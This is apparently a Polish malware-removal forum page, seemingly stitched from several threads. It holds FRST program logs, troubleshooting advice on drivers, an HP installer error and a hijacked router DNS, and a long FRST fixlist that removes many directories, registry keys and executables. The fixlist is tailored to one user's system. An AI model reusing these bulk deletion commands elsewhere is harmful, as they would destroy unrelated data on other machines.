(HKLM-x32\...\{B04A0E2F-1E4C-4E61-B18E-3B2BD6779CA7}) (Version: 15.4.5722.2 - Microsoft Corporation) HP Customer Participation Program 13.0 (HKLM\...\HPExtendedCapabilities) (Version: 13.0 - HP) K-Lite Codec Pack 10.2.0 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 10.2.0 - ) Kontrola Windows Live Mesh ActiveX za daljinske veze (HKLM-x32\...\{19CBDE24-2761-49A5-816B-D2BA65D0CA8D}) (Version: 15.4.5722.2 - Microsoft Corporation) Kontrolnik Windows Live Mesh ActiveX za oddaljene povezave (HKLM-x32\...\{CA227A9D-09BE-4BFB-9764-48FED2DA5454}) (Version: 15.4.5722.2 - Microsoft Corporation) Nuance PDF Reader (HKLM-x32\...\{B480904D-F73F-4673-B034-8A5F492C9184}) (Version: 6.00.0041 - Nuance Communications, Inc.) Real Alternative 2.0.2 (HKLM-x32\...\RealAlt_is1) (Version: 2.0.2 - ) Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 13.0 - HP) Ovládací prvek ActiveX platformy Windows Live Mesh pro vzdálená připojení (HKLM-x32\...\{B6190387-0036-4BEB-8D74-A0AFC5F14706}) (Version: 15.4.5722.2 - Microsoft Corporation) Ovládací prvok ActiveX programu Windows Live Mesh pre vzdialené pripojenia (HKLM-x32\...\{C2FD7DB5-FE30-49B6-8A2F-C5652E053C31}) (Version: 15.4.5722.2 - Microsoft Corporation) Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation) Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation) Windows Live Mesh ActiveX kontrola za daljinske veze (HKLM-x32\...\{8985AE5E-622A-4980-8BF8-0A1830643220}) (Version: 15.4.5722.2 - Microsoft Corporation) Windows Live Mesh ActiveX vadīkla attālajiem savienojumiem (HKLM-x32\...\{A3A775C9-5A63-4C55-8FDD-427A5B8F5D2B}) (Version: 15.4.5722.2 - Microsoft Corporation) Windows Live Mesh ActiveX-i juhtelement kaugühendustele (HKLM-x32\...\{216ACEC1-4556-4717-A8DE-3F7F5F9C6F63}) (Version: 15.4.5722.2 - Microsoft Corporation) Windows Live Mesh ActiveX-vezérlő távoli kapcsolatokhoz (HKLM-x32\...\{6E29C4F7-C2C2-4B18-A15C-E09B92065F15}) (Version: 15.4.5722.2 - Microsoft Corporation) + można też wyciąć wszystkie pozycje oznaczone jako "Oberon". 1. Jak mówiłam, usunięty sterownik ATK0100. Należy udać się na stronę ASUS i dla tego modelu wyszukać pasującą instalację ATK Package lub coś brzmiącego podobnie. Obecnie FRST Addition potwierdza brak tej instalacji. I ogólnie poszukać na stronie ASUS aktualizacji wszystkich sterowników. 2. TrayApp należy do instalacji oprogramowania drukarki Hewlett-Packard, a objaw oznacza uszkodzone powiązane dane Instalatora Windows. ==================== Zainstalowane programy ====================== TrayApp (x32 Version: 130.0.376.000 - Hewlett-Packard) Hidden Dziennik Aplikacja: ================== Error: (12/21/2015 11:56:22 AM) (Source: MsiInstaller) (EventID: 11706) (User: Asus-Komputer) Description: Product: TrayApp -- Error 1706. An installation package for the product TrayApp cannot be found. Try the installation again using a valid copy of the installation package 'TrayApp.msi'. Doraźnie można usunąć dane MSI tego konkretnego obiektu, ale to będzie oznaczać naruszenie instalacji pakietu i na dalszą metę do reinstalacji cały majdan HP (i tu też poszukać nowszej wersji, bo wszystko stare). Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście wpis TrayApp > Dalej.

Uruchom "Narzędzie analizy gotowości aktualizacji systemu": KLIK. Gdy narzędzie ukończy skan, skopiuj na Pulpit cały katalog C:\Windows\Logs\CBS, zapakuj do ZIP i shostuj gdzieś podając link do paczki. Raczej nie sprawdzę tego szybko, bo jutro wyjeżdżam na dwa tygodnie na święta. Czy po jego deinstalacji ustąpił objaw tytułowy "Uruchomienie dowolnego programu powoduje 100% CPU usage"? Spróbuj się posłużyć Wise Program Uninstaller.

Podobny temat już był na forum, też program nagle "zniknął", a próba ponownej instalacji zwróciła taki właśnie komunikat, więc może to jest jakiś automatyczny mechanizm programu po upłynięciu okresu próbnego. I ta sprawa kwalifikuje się do bezpośredniego kontaktu z supportem producenta. Jedyne czego możesz spróbować, to użycie Przywracania systemu do czasu, gdy program jeszcze w systemie działał, chociaż wątpię czy to coś da, jeżeli powyższe objawy są związane z zabezpieczeniem triala.

Dzięki. Temat rozwiązany. Zamykam.

Pośpieszyłeś się, miałeś tylko uruchomić Skanuj i nic nie usuwać jeszcze... Na koniec: 1. Przez SHIFT+DEL (omija Kosz) skasuj następujące foldery: C:\MATS C:\Users\Admin\Desktop\Stare dane programu Firefox 2. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 3. Do czytania na co uważać, by ograniczyć podobne problemy: KLIK.

Wszystkie operacje wykonane, infekcje nie są już czynne. Kolejna porcja zadań: 1. Pod kątem Singapurskiego OpenDNS pobieranego z routera: Tcpip\Parameters: [DhcpNameServer] 213.241.79.38 208.67.220.220 Zaloguj się do routera: W ustawieniach DNS wymaż pole adresu Zapasowego (Secondary) kierujące na 208.67.220.220. Pole można zostawić puste lub zastąpić adesem Google 8.8.4.4 Zmień hasło oraz upewnij się, że jest zamknięty dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK. Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC} Task: {DABE8C50-4D7A-4BA6-B8C6-2F0F5523E4EC} - System32\Tasks\{10A7449D-6C38-4704-89B4-86FCD2629ED7} => pcalua.exe -a "C:\Program Files (x86)\Hard Case\HardCaseUn.exe" -c OFS_ RemoveDirectory: C:\Adwcleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\FRST-OlderVersion RemoveDirectory: C:\MATS RemoveDirectory: C:\Program Files\Google RemoveDirectory: C:\Program Files\Software Informer RemoveDirectory: C:\Program Files\Common Files\mcafee RemoveDirectory: C:\ProgramData\AVAST Software RemoveDirectory: C:\ProgramData\Informer Technologies, Inc RemoveDirectory: C:\ProgramData\Sun RemoveDirectory: C:\ProgramData\Unchecky RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Software Informer RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unchecky RemoveDirectory: C:\uninst RemoveDirectory: C:\Users\fff\AppData\Local\Adobe RemoveDirectory: C:\Users\fff\AppData\Local\CyberLink RemoveDirectory: C:\Users\fff\AppData\Local\Macromedia RemoveDirectory: C:\Users\fff\AppData\LocalLow\Adobe RemoveDirectory: C:\Users\fff\AppData\LocalLow\Company RemoveDirectory: C:\Users\fff\AppData\LocalLow\Oracle RemoveDirectory: C:\Users\fff\AppData\LocalLow\Sun RemoveDirectory: C:\Users\fff\AppData\LocalLow\Microsoft\Silverlight\is\luhqr5vb.die RemoveDirectory: C:\Users\fff\AppData\Roaming\Adobe RemoveDirectory: C:\Users\fff\AppData\Roaming\CyberLink RemoveDirectory: C:\Users\fff\AppData\Roaming\Macromedia RemoveDirectory: C:\Users\fff\Desktop\Old Firefox Data RemoveDirectory: C:\Users\fff\Documents\Optimizer Pro RemoveDirectory: C:\Users\Public\Pokki CMD: del /q C:\lhq11jj2.exe CMD: del /q C:\Users\fff\Desktop\48z28tmn.exe CMD: del /q C:\Users\fff\Desktop\AdwCleaner.exe CMD: del /q C:\Users\fff\Desktop\RepairDNS.txt CMD: del /q C:\Users\fff\Documents\fixlist.txt CMD: del /q C:\Users\fff\Documents\gmer.txt CMD: del /q C:\Users\fff\Downloads\adwcleaner_5.025.exe CMD: del /q C:\Users\fff\Downloads\lhq11jj2.exe CMD: del /q C:\Users\fff\Downloads\MicrosoftFixit.ProgramInstallUninstall.RNP.Run.exe CMD: del /q C:\Users\fff\Downloads\RepairDNS.exe CMD: del /q C:\Users\fff\Downloads\rkill.exe CMD: del /q C:\Windows\system32\Drivers\{1792ab0b-c92b-49ed-ad87-bb9f82f84827}Gw64.sys CMD: ipconfig /flushdns EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Przedstaw wynikowy fixlog.txt. 3. Zrób logi z Farbar Service Scanner oraz najnowszego AdwCleaner z opcji Skanuj.